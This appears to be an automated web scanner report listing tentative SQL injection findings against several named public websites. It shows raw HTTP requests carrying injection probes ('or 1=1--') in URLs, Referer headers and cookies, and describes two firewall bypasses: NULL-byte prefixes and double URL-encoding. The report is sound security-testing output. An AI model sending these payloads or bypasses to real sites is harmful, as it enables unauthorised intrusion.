GET /templates/kontent11/css/typography.css?119760934%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:09:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Thu, 13 Jan 2011 07:46:42 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:09:06 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 5015

/* Copyright (C) 2007 - 2011 YOOtheme GmbH, YOOtheme Proprietary Use License (http://www.yootheme.com/license) */

/*
* headings
*/

h1, h2, h3, h4, h5, h6 { font-family: Arial, Helvetica, sans-serif; }

h1 {
   font-weight: normal;
   color: #c8001e;
}

#page h1 a {
   color: #c8001e;
   text-decoration: none;
}

h2 { color: #50555A; }
h3 { color: #c8001e; }
h4 { color: #50555A; }
h5 { color: #c8001e; }
h6 { color: #50555A; }

/*
* anchor
*/

a:link,
a:visited { color: #C8001E; }
a:hover { color: #ff0000; }

a.icon-folder {
padding-left: 17px;
background: url(../images/typography/icon_folder.png) 0 40% no-repeat;
}

a.icon-file {
padding-left: 17px;
background: url(../images/typography/icon_file.png) 0 40% no-repeat;
}

a.icon-download {
padding-left: 17px;
background: url(../images/typography/icon_download.png) 0 40% no-repeat;
}

a.icon-external {
padding-left: 17px;
background: url(../images/typography/icon_external.png) 0 40% no-repeat;
}

a.icon-pdf {
padding-left: 17px;
background: url(../images/pdf_button.png) 0 40% no-repeat;
}

/*
* emphasis
*/

em.box {
   padding: 0px 3px 0px 3px;
   border: 1px dotted #aaaaaa;
   background: #f5f6f7;
   font-family: "Courier New", Courier, monospace;
   font-style: normal;
}

/*
* unsorted lists
*/

ul.arrow,
ul.checkbox,
ul.check,
ul.star {
   margin: 10px 0px 10px 0px;
   padding-left: 20px;
   list-style: none;
}

ul.arrow li,
ul.checkbox li,
ul.check li,
ul.star li {
   margin: 5px 0px 5px 0px;
   padding-left: 35px;
   font-weight: bold;
   line-height: 26px;
}


...[SNIP]...

1.35. http://news.google.com/news/story [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://news.google.com
Path:   /news/story

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /news/story%00'?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddEQewEuUXr-br5MJHZzY7RO2mw5NM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d13\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIMBEKoCMAw\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=jZrs3cCWBn0xZT77GEp4ng6trYgsZovDypVU0IsvIShEZS8ZkZZAFVYAMVBEGWkAShB4zy9TehSUB3gOSm8n-qMJEzIfGt4l1DZK3SOX98F4_DqU16tL5mH6Vo98LqXN;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 23:19:03 GMT;HttpOnly
Date: Mon, 24 Jan 2011 23:19:03 GMT
Expires: Mon, 24 Jan 2011 23:19:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
mp;hl=en&amp;docUrl=http://www.latimes.com/news/opinion/commentary/la-oe-banner-bishop-20110124,0,56458.story&amp;docId=5979450056146080422&amp;cid=17593850378022&amp;title=An+amendment+rooted+in+past+failures&amp;viewed=1295900158">
...[SNIP]...

Request 2

GET /news/story%00''?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddEQewEuUXr-br5MJHZzY7RO2mw5NM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d13\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIMBEKoCMAw\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=iDLVLHDDdWCuDQlnKKnsMpP210VjSthtUjTfyN9DO1nU2O8zHol2Uj3PMcmzQrnxg-stxmc5YfU-G2Y3nHiBdl2pUs5ek63oKtdQ2Heg3Z5mlepoDk88ayrZVhvyU4lm;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 23:19:16 GMT;HttpOnly
Date: Mon, 24 Jan 2011 23:19:16 GMT
Expires: Mon, 24 Jan 2011 23:19:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

1.36. http://news.google.com/nwshp [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://news.google.com
Path:   /nwshp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /nwshp HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=VOA5j4gKvQ1lozvn1L9GnR0vTwwvCjN_rcMbzL76tquDdSGofd54E0zij2ac7mD7QdvS1Xn95ocEtNX8SzJku0k3KFn-kjEhjOpKjrbX1OLxbuMD-IWHDPRpym6LzkuI;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 23:10:43 GMT;HttpOnly
Date: Mon, 24 Jan 2011 23:10:43 GMT
Expires: Mon, 24 Jan 2011 23:10:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
mp;hl=en&amp;docUrl=http://www.latimes.com/news/opinion/commentary/la-oe-banner-bishop-20110124,0,56458.story&amp;docId=5979450056146080422&amp;cid=17593850378022&amp;title=An+amendment+rooted+in+past+failures&amp;viewed=1295900158">
...[SNIP]...

Request 2

GET /nwshp HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=wRRSBXwEb9ylWiQN7U3r5UHEkh8KlGuQ82ntnGF9MReGDuFr5f26Cdd_BmfC6XuPVZrIgN7RhVk2Y3e70iNw2OToQ_pD9OK_LQz7YygkGLN5Xop1Eaz5IiYBk0GJrcrs;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 23:11:00 GMT;HttpOnly
Date: Mon, 24 Jan 2011 23:11:00 GMT
Expires: Mon, 24 Jan 2011 23:11:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

1.37. http://powersportsnetwork.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://powersportsnetwork.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: powersportsnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:50:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Pragma: no-store
Content-Length: 39258
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Cache-control: Private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Motorcycle and ATV reviews, specifications, prices, used motorcycles by PowerSports Network</TITLE><META name="desc
...[SNIP]...
<img alt='Progressive Motorcycle' src='http://www.powersportsnetwork.com/adimage.asp?ad=5&slot=PSN%20Banner&sponsor=Progressive&ordinal=1&id=25' style='border:none 0px transparent; height:90px; width:728px;'/></a></td><td width="20"></td></tr>            </table>        </td></tr></table>    </td>    </tr>    <tr>    <td height="2"><table cellspacing="0" cellpadding="0"><tr><td height="2" width="9" background="/images/psn0708_grey-bar-left.gif"></td><td width="169" bgcolor="white"></td></tr></table></td>    <td height="2" bgcolor="white"></td>    <td height="2"><table cellspacing="0" cellpadding="0"><tr><td height="2" width="168" bgcolor="white"></td><td height="2" width="10" background="/images/psn0708_grey-bar-right.gif"></td></tr></table></td></tr>    <!-- Template header end --><!-- Template body 3 sections -->    <tr><!-- Left margin -->    <td width="178" valign="top" background="/images/psn0606_bar_1.gif" rowspan="2">        <table width="100%" border="0" cellpadding="0" cellspacing="0"><!-- Navigation -->            <tr>                <td>                    <table cellpadding="0" cellspacing="0" border="0" width="100%">                        <tr><td valign="center" class="navlink_header" background="/images/psn0606_bar_1_top.jpg">&nbsp;&nbsp;&nbsp; <a class="navlink_header" href="http://www.powersportsnetwork.com/enthusiasts/default.asp">Home</a></td></tr>                        
                           <tr><td class="navlink_bar">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class="navlink_header" href="http://www.powersportsnetwork.com/enthusiasts/user_landing.asp">Members</a></td></tr>
                           
                               <tr><td class="navlink" background="/images/psn0606_bar_1_nav.jpg">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class="navlink" href="https://www.powersportsnetwork.com/enthusiasts/classified_ad_signin.asp">Log In</a></td></tr>
                           
                               <tr><td class="navlink" background="/images/psn0606_bar_1_nav.jpg">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class="navlink" href="https://www.powersportsnetwork.com/enthusiasts/register.asp">Register</a></td></tr
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: powersportsnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:50:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Pragma: no-store
Content-Length: 39247
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Cache-control: Private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE>Motorcycle and ATV reviews, specifications, prices, used motorcycles by PowerSports Network</TITLE><META name="desc
...[SNIP]...
<img alt='Progressive' src='http://www.powersportsnetwork.com/adimage.asp?ad=5&slot=PSN%20Banner&sponsor=Progressive&ordinal=1&id=26' style='border:none 0px transparent; height:90px; width:728px;'/></a></td><td width="20"></td></tr>            </table>        </td></tr></table>    </td>    </tr>    <tr>    <td height="2"><table cellspacing="0" cellpadding="0"><tr><td height="2" width="9" background="/images/psn0708_grey-bar-left.gif"></td><td width="169" bgcolor="white"></td></tr></table></td>    <td height="2" bgcolor="white"></td>    <td height="2"><table cellspacing="0" cellpadding="0"><tr><td height="2" width="168" bgcolor="white"></td><td height="2" width="10" background="/images/psn0708_grey-bar-right.gif"></td></tr></table></td></tr>    <!-- Template header end --><!-- Template body 3 sections -->    <tr><!-- Left margin -->    <td width="178" valign="top" background="/images/psn0606_bar_1.gif" rowspan="2">        <table width="100%" border="0" cellpadding="0" cellspacing="0"><!-- Navigation -->            <tr>                <td>                    <table cellpadding="0" cellspacing="0" border="0" width="100%">                        <tr><td valign="center" class="navlink_header" background="/images/psn0606_bar_1_top.jpg">&nbsp;&nbsp;&nbsp; <a class="navlink_header" href="http://www.powersportsnetwork.com/enthusiasts/default.asp">Home</a></td></tr>                        
                           <tr><td class="navlink_bar">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class="navlink_header" href="http://www.powersportsnetwork.com/enthusiasts/user_landing.asp">Members</a></td></tr>
                           
                               <tr><td class="navlink" background="/images/psn0606_bar_1_nav.jpg">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class="navlink" href="https://www.powersportsnetwork.com/enthusiasts/classified_ad_signin.asp">Log In</a></td></tr>
                           
                               <tr><td class="navlink" background="/images/psn0606_bar_1_nav.jpg">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class="navlink" href="https://www.powersportsnetwork.com/enthusiasts/register.asp">Register</a></td></tr>
                           
...[SNIP]...

1.38. http://spongecell.com/event_page/view/915725 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://spongecell.com
Path:   /event_page/view/915725

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /event_page/view/915725 HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 502 Bad Gateway
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:19:05 GMT
Content-Type: text/html
Content-Length: 2968
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Spongecell</title>
   <meta http-equiv="Pragma" co
...[SNIP]...
<h2 class="primary">A server error has occurred.</h2>
...[SNIP]...

Request 2

GET /event_page/view/915725 HTTP/1.1
Host: spongecell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.6.35
Date: Tue, 25 Jan 2011 13:19:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: _spongecell_loves_u=BAh7CDoJa2V5c1sAOgtsb2NhbGUiCmVuLVVTIgpmbGFzaElDOidBY3Rpb25D%250Ab250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6CW5vdGUwBjoKQHVzZWR7%250ABjsIVA%253D%253D--5f6777943aa1e5d6b4a2cab61b42984a90431a22; domain=.spongecell.com; path=/
Status: 302 Found
Location: http://spongecell.com/event/view/915725
Cache-Control: no-cache
Content-Length: 105

<html><body>You are being <a href="http://spongecell.com/event/view/915725">redirected</a>.</body></html>

1.39. http://techcrunch.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://techcrunch.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 80922731'%20or%201%3d1--%20 and 80922731'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?180922731'%20or%201%3d1--%20=1 HTTP/1.1
Host: techcrunch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 13:22:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://techcrunch.com/xmlrpc.php
Link: <http://wp.me/NaxW>; rel=shortlink
Content-Length: 124296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<link rel="icon" type="image/png" href="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/favicons/techcrunch.png?m=1268499598g" />
       <link rel="apple-touch-icon" href="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/webclips/techcrunch.png?m=1268499598g"/>
       <meta property="og:site_name" content="TechCrunch"/>                <script src='http://wordpress.com/remote-login.php?action=js&amp;host=techcrunch.com&amp;id=11718616&amp;t=1295961735&amp;back=techcrunch.com%2F%3F180922731%5C%27%2520or%25201%253d1--%2520%3D1' type="text/javascript"></script>
       <script type="text/javascript">
       /* <![CDATA[ */
           if ( 'function' === typeof WPRemoteLogin ) {
               document.cookie = "wordpress_test_cookie=test; path=/";
               if ( document.cookie.match( /(;|^)\s*wordpress_test_cookie\=/ ) ) {
                   WPRemoteLogin();
               }
           }
       /* ]]> */
       </script>
       <script type="text/javascript">
/* <![CDATA[ */
function addLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func;}else{window.onload=function(){oldonload();func();}}}
/* ]]> */
</script>
<link rel="stylesheet" href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1291749258g" type="text/css" />
<link rel='stylesheet' id='st_player_style-css' href='http://jb.speakertext.com/player/speakertext.css?ver=MU' type='text/css' media='all' />
<script> var STapiKey = 'STEMBEDAPIKEY'; var STglobalSettings = {initialState: 'open', defaultHeight: 210};</script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&amp;ver=1.4.4'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js?m=1283372775g&amp;ver=MU'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://tctechcrunch.wordpress.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://tctechcrunch.wordpress.com/wp-includes/wlwmanifest.xml" />
<link rel='index' title='TechCrunch' hr
...[SNIP]...

Request 2

GET /?180922731'%20or%201%3d2--%20=1 HTTP/1.1
Host: techcrunch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jan 2011 13:22:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://techcrunch.com/xmlrpc.php
Link: <http://wp.me/NaxW>; rel=shortlink
Content-Length: 124727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<link rel="icon" type="image/png" href="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/favicons/techcrunch.png?m=1265111136g" />
       <link rel="apple-touch-icon" href="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/webclips/techcrunch.png?m=1265111136g"/>
       <meta property="og:site_name" content="TechCrunch"/>                <script src='http://wordpress.com/remote-login.php?action=js&amp;host=techcrunch.com&amp;id=11718616&amp;t=1295961738&amp;back=techcrunch.com%2F%3F180922731%5C%27%2520or%25201%253d2--%2520%3D1' type="text/javascript"></script>
       <script type="text/javascript">
       /* <![CDATA[ */
           if ( 'function' === typeof WPRemoteLogin ) {
               document.cookie = "wordpress_test_cookie=test; path=/";
               if ( document.cookie.match( /(;|^)\s*wordpress_test_cookie\=/ ) ) {
                   WPRemoteLogin();
               }
           }
       /* ]]> */
       </script>
       <script type="text/javascript">
/* <![CDATA[ */
function addLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func;}else{window.onload=function(){oldonload();func();}}}
/* ]]> */
</script>
<link rel="stylesheet" href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1291749258g" type="text/css" />
<link rel='stylesheet' id='st_player_style-css' href='http://jb.speakertext.com/player/speakertext.css?ver=MU' type='text/css' media='all' />
<script> var STapiKey = 'STEMBEDAPIKEY'; var STglobalSettings = {initialState: 'open', defaultHeight: 210};</script>
<script type='text/javascript' src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
<script type='text/javascript' src='http://s1.wp.com/wp-includes/js/jquery/jquery.js?m=1290133841g&amp;ver=1.4.4'></script>
<script type='text/javascript' src='http://s2.wp.com/wp-content/themes/vip/tctechcrunch/js/main.js?m=1283372775g&amp;ver=MU'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://tctechcrunch.wordpress.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://tctechcrunch.wordpress.com/wp-includes/wlwmanifest.xml" />
<link rel='index' title='TechCrunch' hr
...[SNIP]...

1.40. http://trsrvr.com/x/www/delivery/ck.php [zoneid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://trsrvr.com
Path:   /x/www/delivery/ck.php

Issue detail

The zoneid parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the zoneid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /x/www/delivery/ck.php?zoneid=378%20and%201%3d1--%20 HTTP/1.1
Host: trsrvr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:21:42 GMT
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: =%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=ffd6d0a81bbf9cf0750489d1c895bb05; expires=Wed, 25-Jan-2012 13:21:42 GMT; path=/
Location: http://uberdownloads.net/apps/free-download/free-7-zip-download-v2.php?brand=uberdownloads.net&s=google&country=US&c=uber.net_7zip_alot_pg_wb&k={keywords}&pk=7032
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /x/www/delivery/ck.php?zoneid=378%20and%201%3d2--%20 HTTP/1.1
Host: trsrvr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:21:45 GMT
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: =%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=b9fcfc411ae55970818c189d79ba68e6; expires=Wed, 25-Jan-2012 13:21:45 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.41. http://tweetmeme.com/story/1452917957/ [__utmv cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tweetmeme.com
Path:   /story/1452917957/

Issue detail

The __utmv cookie appears to be vulnerable to SQL injection attacks. The payloads 83547739'%20or%201%3d1--%20 and 83547739'%20or%201%3d2--%20 were each submitted in the __utmv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/1452917957/ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=83547739'%20or%201%3d1--%20; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:43 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.00382399559021
X-Served-In: 0.027514934539795
X-Served-By: ded2059
Content-Length: 35059

